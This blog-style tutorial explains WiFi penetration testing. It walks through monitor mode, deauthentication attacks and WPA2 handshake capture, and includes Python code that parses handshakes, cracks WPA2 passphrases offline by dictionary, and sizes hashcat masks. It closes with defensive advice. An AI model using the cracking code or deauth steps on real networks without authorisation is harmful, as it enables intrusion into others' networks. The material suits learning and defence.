One of the tools I've added to my cybersecurity toolbox is penetration testing, which is the art of getting past a network's defenses, not to steal data or for any other malicious purpose, but to assess how secure it really is and to recommend ways to strengthen it.
My journey down this rabbit hole started with one question: "Just how easy and feasible would it be to hack someone's WiFi anyway?"
Today, I want to answer that question and introduce you to the world of WiFi penetration testing. It is certainly not the only type of penetration testing, but it is a great starting point for anyone who wants to learn more about cybersecurity, networks, or how the internet actually operates on a fundamental level.
It will take some time to gather the necessary skills, as it requires a solid technical understanding of how networks work and how data travels between devices and wireless access points. You may also need to buy some additional equipment. However, this knowledge is attainable for anyone with the motivation to pursue it.
Tools and Equipment
The first thing you will need to hack a WiFi access point is a tool capable of capturing and injecting packets. Packets are the small pieces of data that float around us virtually all the time in the modern world. When packets are combined, they form the important pieces of information that fuel our lives. Everything from our Facebook login information to that funny meme you want to send is passed from one device to another via packets.
What can capture and inject packets? In most cases, a computer can: most notably a laptop, but a desktop with a wireless adapter may also suffice. However, not all wireless cards are created equal in this regard. Capture requires a card and driver that support "monitor mode," in which the card hands every 802.11 frame it hears on its current channel to the operating system, not just the frames addressed to it. Injection (transmitting arbitrary raw frames) is a separate driver capability; some cards support both, some only monitor mode, and some neither. Windows drivers generally expose neither, so a Linux system is recommended for this task.
On Linux, the classic way to enable monitor mode is with the legacy wireless tools:
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
Replace wlan0 with your adapter's interface name. ifconfig and iwconfig are deprecated on current distributions, where the same steps are done with ip link and iw; either way, check afterwards that the interface type now reads "monitor," and remember that a card in monitor mode only hears the single channel it is tuned to.
There are also programs that simplify this further. airmon-ng, from the aircrack-ng suite, puts an adapter into monitor mode with a single command and kills the network-manager processes that would otherwise fight you for control of the card.
Alternative Devices
Computers are not the only way to capture packets. There are several smaller devices that can do this as well. The Flipper Zero, for example, is probably the most well-known device in this category, but not necessarily the best. A Flipper Zero on its own will not get the job done: its built-in radios don't speak WiFi at all. You'll need to attach its WiFi dev board (an ESP32) running the Marauder firmware to gain the ability to capture and inject WiFi packets. Flippers are not traditionally used in WiFi hacking, as a laptop with a WiFi adapter capable of monitor mode is the preferred method of attack. However, their ease of use and portability make them worth considering.
Capturing Packets
Once you've determined that your computer or other equipment can capture and inject packets, the next step is to actually do so. Several programs can capture packets; Wireshark is the famous example. With your card in monitor mode, start Wireshark on that interface and you will see every 802.11 frame on the channel the card is tuned to in real time (the display filter eapol shows only handshake frames). Wireshark itself cannot inject packets, so it covers only the first half of the job.
To crack a WiFi password, you first need to capture the 4-way handshake that a client and an access point exchange when the client joins a WPA/WPA2 network. The handshake never sends the password itself; it proves that both sides hold the key derived from it and establishes the session keys. If you are passively capturing on the network's channel, you will eventually catch a handshake whenever a device connects or reconnects, which happens often in a busy area. This is referred to as a passive attack.
For a more targeted approach, you'll need an active attack, such as a deauthentication (deauth) attack. This involves injecting forged deauthentication frames, spoofed as if they came from the access point, at a connected client (or at the broadcast address to hit every client at once). The client obediently drops off and reconnects, and you capture the handshake as it does. aireplay-ng from the aircrack-ng suite, or wifite, which automates the whole capture, can perform these attacks if your adapter supports both capture and injection. Note that networks with Protected Management Frames (802.11w) enabled discard unauthenticated deauth frames, so this trick does not work against them.
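Knowing which of the four messages you actually captured matters more than the raw frame count, so here is an added Python example of my own (not code from the original post or from the aircrack-ng project) that parses EAPOL-Key frames, labels them as handshake messages 1 to 4, and decides whether the capture holds a pair you can crack. The frame layout follows IEEE 802.11; the four sample frames are constructed inside the block rather than taken from a real capture, and the rule that message 2 carries key data (the client's RSN element) while message 4 carries none is the same heuristic the common tools rely on to tell those two apart.

```python
import struct
from dataclasses import dataclass

# Key Information bits of an EAPOL-Key frame (IEEE 802.11, 12.7.2).
KEY_TYPE_PAIRWISE = 1 << 3
KEY_INSTALL = 1 << 6
KEY_ACK = 1 << 7
KEY_MIC = 1 << 8
KEY_SECURE = 1 << 9

# Fixed part of the EAPOL-Key body: descriptor type, key info, key length, replay counter,
# nonce, IV, RSC, reserved, MIC, key data length. Key data follows.
_BODY_FMT = "!BHHQ32s16s8s8s16sH"
_BODY_LEN = struct.calcsize(_BODY_FMT)   # 95 bytes


@dataclass
class EapolKey:
    key_info: int
    replay_counter: int
    nonce: bytes
    mic: bytes
    key_data: bytes


def parse_eapol_key(frame: bytes) -> EapolKey:
    """Parse an 802.1X frame (what is left after the 802.11 and LLC/SNAP headers are stripped)."""
    version, packet_type, length = struct.unpack_from("!BBH", frame, 0)
    if packet_type != 3:
        raise ValueError(f"not an EAPOL-Key frame (packet type {packet_type})")
    body = frame[4:4 + length]
    if len(body) < _BODY_LEN:
        raise ValueError("truncated EAPOL-Key body")
    fields = struct.unpack_from(_BODY_FMT, body, 0)
    key_info, replay, nonce, mic, key_data_len = fields[1], fields[3], fields[4], fields[8], fields[9]
    return EapolKey(key_info, replay, nonce, mic, body[_BODY_LEN:_BODY_LEN + key_data_len])


def handshake_message(key: EapolKey) -> int:
    """Return 1..4 for the 4-way handshake message this frame is, or 0 for a group-key frame."""
    info = key.key_info
    if not info & KEY_TYPE_PAIRWISE:
        return 0
    ack, mic, install = bool(info & KEY_ACK), bool(info & KEY_MIC), bool(info & KEY_INSTALL)
    if ack and not mic:
        return 1            # AP -> client: ANonce, no MIC yet
    if ack and mic and install:
        return 3            # AP -> client: ANonce again, MIC, encrypted group key
    if mic and not ack and not install:
        # M2 and M4 are both client -> AP with a MIC; M2 carries the client's RSN IE, M4 has no key data.
        return 2 if key.key_data else 4
    raise ValueError(f"unexpected key info 0x{info:04x}")


def has_crackable_pair(frames) -> bool:
    """True if the capture holds M1+M2 (same replay counter) or M2+M3 (M3 counter = M2 counter + 1).
    Either pair supplies both nonces and a MIC to test candidates against; M4 on its own adds nothing."""
    by_msg = {}
    for frame in frames:
        key = parse_eapol_key(frame)
        by_msg.setdefault(handshake_message(key), []).append(key)
    for m2 in by_msg.get(2, []):
        if any(m1.replay_counter == m2.replay_counter for m1 in by_msg.get(1, [])):
            return True
        if any(m3.replay_counter == m2.replay_counter + 1 for m3 in by_msg.get(3, [])):
            return True
    return False


def build_eapol_key(key_info, replay, nonce=bytes(32), mic=bytes(16), key_data=b"") -> bytes:
    """Builds a synthetic EAPOL-Key frame for the sample below (constructed test data, not a real capture)."""
    body = struct.pack(_BODY_FMT, 2, key_info, 16, replay, nonce, bytes(16), bytes(8), bytes(8), mic, len(key_data)) + key_data
    return struct.pack("!BBH", 2, 3, len(body)) + body


# Constructed WPA2-CCMP handshake: key descriptor version 2 (HMAC-SHA1 MIC), pairwise bit set throughout.
_V2 = 2 | KEY_TYPE_PAIRWISE
_RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # CCMP group, CCMP pairwise, PSK
_ANONCE, _SNONCE = bytes(range(32)), bytes(range(32, 64))
SAMPLE_HANDSHAKE = [
    build_eapol_key(_V2 | KEY_ACK, 1, nonce=_ANONCE),
    build_eapol_key(_V2 | KEY_MIC, 1, nonce=_SNONCE, mic=b"\x11" * 16, key_data=_RSN_IE),
    build_eapol_key(_V2 | KEY_ACK | KEY_MIC | KEY_INSTALL | KEY_SECURE, 2, nonce=_ANONCE, mic=b"\x22" * 16, key_data=b"\xaa" * 56),
    build_eapol_key(_V2 | KEY_MIC | KEY_SECURE, 2, mic=b"\x33" * 16),
]

if __name__ == "__main__":
    for i, frame in enumerate(SAMPLE_HANDSHAKE, 1):
        print(f"frame {i}: handshake message {handshake_message(parse_eapol_key(frame))}")
    print("crackable:", has_crackable_pair(SAMPLE_HANDSHAKE))
```

Feeding this real frames means stripping the radiotap, 802.11 and LLC/SNAP headers first; the replay-counter check is what stops you from pairing a message 2 from one association attempt with a message 1 from another, which is a common reason a "complete" capture refuses to crack.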
Cracking the Password
After capturing the handshake, you can check it in Wireshark to see which of the four messages you have. You don't strictly need all four: messages 1 and 2 (or 2 and 3) are enough, because between them they contain both nonces and a message integrity code (MIC). However, you're not done yet. The handshake doesn't reveal the password directly, and it doesn't even carry a hash of it. What it carries is a MIC computed with a key that is derived from the password, the network name, the two MAC addresses and the two nonces. A cracker takes each candidate password, runs the same derivation, recomputes the MIC and compares it with the captured one; a match means the candidate is the password. The derivation is a deliberately slow hash, so every guess costs real work, and nobody can just snatch the password out of thin air.
To crack it, you'll use a tool like hashcat. Hashcat runs on Linux, Windows and macOS and, for WPA/WPA2 (hash mode 22000, fed from a capture converted with hcxpcapngtool), can test the handshake against a massive list of passwords (dictionary attack), every combination of characters up to a given length (brute-force attack), a combination of both (hybrid attack), and more.
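To make concrete what "cracking the handshake" actually does, here is an added Python example of my own (not hashcat's code and not from the original post) that performs hashcat's mode 22000 work in miniature: derive the PMK from each candidate with PBKDF2, expand it to the PTK, recompute the MIC over message 2 and compare. The SSID, MAC addresses, nonces and message 2 are constructed inside the block with a known passphrase so the attack has something to recover; in practice those values come out of your capture. Key descriptor version 3 (AES-CMAC) is deliberately left out.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key body before the MIC field


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt, 256-bit output (IEEE 802.11 Annex J).
    This is the slow step; a cracker pays it once per candidate password."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce)).
    The KCK, the first 128 bits of the PTK, is the key that protects the handshake MICs."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC over the whole 802.1X frame with its MIC field zeroed. The key descriptor version (low three bits
    of Key Info) selects the algorithm: 1 = HMAC-MD5 (TKIP), 2 = HMAC-SHA1-128 (CCMP)."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    version = struct.unpack_from("!H", eapol_frame, 5)[0] & 0x7
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_m2, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: re-derive the KCK from each candidate and compare the recomputed MIC with the captured one."""
    captured_mic = eapol_m2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in candidates:
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8..63 characters; skip impossible guesses
            continue
        kck = kck_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if eapol_mic(kck, eapol_m2) == captured_mic:
            return candidate
    return None


def make_sample(passphrase: str):
    """Constructed handshake data (not a real capture): builds message 2 for the given passphrase so the
    cracker has something realistic to test against. With a pcap these six values come from the frames."""
    ssid = "ExampleNet"
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    key_info = 0x010a   # pairwise, MIC bit set, descriptor version 2 (HMAC-SHA1 MIC)
    body = struct.pack("!BHHQ32s16s8s8s16sH", 2, key_info, 16, 1, snonce, bytes(16), bytes(8), bytes(8), bytes(16), len(rsn_ie)) + rsn_ie
    eapol = struct.pack("!BBH", 1, 3, len(body)) + body
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]
    return ssid, ap_mac, sta_mac, anonce, snonce, eapol


SAMPLE = make_sample("correct horse battery")
WORDLIST = ["password", "12345678", "letmein123", "correct horse battery", "Summer2024!"]   # constructed

if __name__ == "__main__":
    print("recovered:", crack_handshake(*SAMPLE, WORDLIST))
```

The shape of crack_handshake is the whole story of the time estimates that follow: everything except pmk_from_passphrase is cheap, so the guessing rate is set almost entirely by how many PBKDF2 runs per second your hardware manages.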
Estimating Time to Crack
To give you an idea of how long this could take, consider my GPU with 12 GB of memory, which can run about 3 billion WPA2 hashes per hour (roughly 830,000 per second). That may sound like a lot, but it isn't against a strong, random password. For example, my ISP assigns a random password of 12 digits to each of its modems. That is 10^12 possible combinations, so exhausting the whole space at 3 billion per hour takes about 333 hours, roughly two weeks of continuous GPU time, with the average case around one week. An 8-character password made only of lowercase letters (26^8, about 2 × 10^11 combinations) falls in about three days; eight characters drawn from all 95 printable ASCII characters (95^8, about 6.6 × 10^15) would take a couple of centuries on the same card.
If the attacker has access to a computer with several GPUs linked together, those days can shrink to hours or even minutes with enough power. While it is unlikely that anyone but the most dedicated and professional hacker would have such a computer, in the modern era, even this hurdle can be overcome. There are a plethora of services out there that mask themselves as "advanced password recovery services" that, for a fee, can use their computational power to crack your captured hash for you.
That is if you're using a brute-force attack to check every conceivable combination. If the victim has a weak password, it can be checked against a list of common passwords, referred to as a dictionary or wordlist. Very weak passwords such as "password123" or "12345678" fall in seconds because they sit near the top of any wordlist. The bottom line is that the best defense is a long, random password, as it will stop all but the most motivated attackers.
Password Strength
Unfortunately, we don't usually stick to such random passwords. We have patterns, and as just mentioned, there are wordlists (dictionaries) with billions of entries that a single GPU can run through in hours. Not only that, hashcat lets you exploit known patterns in two ways. Rules mutate each dictionary word (capitalise it, append a year, swap letters for digits), and a mask attack brute-forces only the positions you choose, with the character set you choose. For example, if you suspect a company's WiFi password is its name followed by six characters, a mask such as Acme?a?a?a?a?a?a tries the name followed by every combination of six printable characters, about 7 × 10^11 guesses (around 10 days at 3 billion per hour) instead of the 95^10 guesses a blind brute force of the same ten-character password would need. Narrowing the keyspace this way vastly decreases the time needed to crack a password.
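As an added example of my own (not hashcat's code and not from the original post), here is a Python implementation of hashcat's mask syntax that also puts numbers on the estimates from the Estimating Time to Crack section: it expands a mask into candidates, counts its keyspace, and converts that into hours at a given guessing rate. Only the built-in charsets ?l ?u ?d ?s ?a ?h ?H and literal characters are handled; custom charsets (?1 to ?4) and ?b are not.

```python
import itertools
import math
import string
from typing import Iterator, List

# hashcat's built-in charsets (?b raw bytes and custom ?1..?4 are not handled here).
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,   # 33 characters: space plus all ASCII punctuation
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]   # 95 printable ASCII


def parse_mask(mask: str) -> List[str]:
    """Turn a hashcat mask into one alphabet per password position.
    Literal characters stand for themselves; '??' is a literal question mark."""
    positions, i = [], 0
    while i < len(mask):
        ch = mask[i]
        if ch == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            tag = mask[i + 1]
            if tag == "?":
                positions.append("?")
            elif tag in CHARSETS:
                positions.append(CHARSETS[tag])
            else:
                raise ValueError(f"unknown charset ?{tag}")
            i += 2
        else:
            positions.append(ch)
            i += 1
    return positions


def keyspace(mask: str) -> int:
    """Number of candidates the mask describes: the product of the alphabet sizes per position."""
    return math.prod(len(p) for p in parse_mask(mask))


def expand(mask: str) -> Iterator[str]:
    """Generate every candidate the mask describes (what hashcat -a 3 feeds to the hash function)."""
    for combo in itertools.product(*parse_mask(mask)):
        yield "".join(combo)


def hours_to_exhaust(mask: str, hashes_per_second: float) -> float:
    """Worst-case time to try every candidate; the expected time to hit the right one is half this."""
    return keyspace(mask) / hashes_per_second / 3600


if __name__ == "__main__":
    rate = 3e9 / 3600   # the 3 billion WPA2 guesses per hour from the post's GPU
    for mask in ["?d" * 12, "?l" * 8, "?a" * 8, "Acme?a?a?a?a?a?a", "Acme?d?d?d?d"]:
        print(f"{mask:24} keyspace {keyspace(mask):.3g}  ->  {hours_to_exhaust(mask, rate):,.1f} h")
```

Running it shows the whole argument of the last two sections in one table: twelve digits and eight lowercase letters are days to weeks, eight characters from the full printable set is centuries, and a four-digit suffix on a known word is ten thousand guesses, which is over before you have finished reading the output.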
Additional Considerations
There are a few miscellaneous considerations before concluding. First, check whether your router has WPS (Wi-Fi Protected Setup) enabled, and turn it off; if it is an older model on which WPS cannot be disabled, replace it. WPS usage declined rapidly in the mid-2010s once its weaknesses became public, but it is often switched on by default without the owner knowing. In 2024, there is no benefit to having WPS turned on. WPS is vulnerable to several attacks, both brute-forcing of its short PIN against the router and, on many chipsets, offline attacks, which I won't list here as they are becoming dated. The important thing to remember is that these attacks are far quicker than cracking a handshake and need no powerful computer. All you need to do to protect yourself against them is to turn WPS off.
On the flip side, the attacks we discussed are also becoming obsolete, albeit more slowly, because they only apply to WPA/WPA2-Personal networks. In 2018, WPA3 was introduced with a set of new protections. As of writing, WPA3 is still not very widely used by individuals; it is more common to see businesses move to it, as they generally need stronger protection. Two of its changes matter here. WPA3 requires Protected Management Frames (802.11w), so forged deauthentication frames are simply ignored and the deauth trick no longer works (PMF can also be switched on for many WPA2 networks). And WPA3-Personal replaces the pre-shared-key handshake with SAE (Simultaneous Authentication of Equals), in which capturing the exchange gives an attacker nothing to crack offline: every password guess requires a fresh live exchange with the access point, which is slow and noisy rather than something a GPU can grind through in private. Note that a router running WPA3 in transition mode still accepts WPA2 clients, and those connections are as crackable as before.
Conclusion
So, how easy is it to hack someone's WiFi? It depends primarily on the strength of the password. For the average person, cracking a random password is doable but not ideal and requires significant motivation. Cracking a weak password, however, is a simple affair.
This is good news for those willing to put in the effort to create and memorize strong passwords. In my decade in law enforcement, I've learned something important about the nature of criminals. Most people imagine criminals as panthers, stealthily stalking their prey and attacking at just the right time. This is not the case, however. They are more like crocodiles, sitting by the watering hole waiting for the low-hanging fruit to fall into their mouths. They put in the least amount of effort and risk to attain their goals. Don't be low-hanging fruit. Keep a strong password and avoid the overwhelming majority of nasty surprises.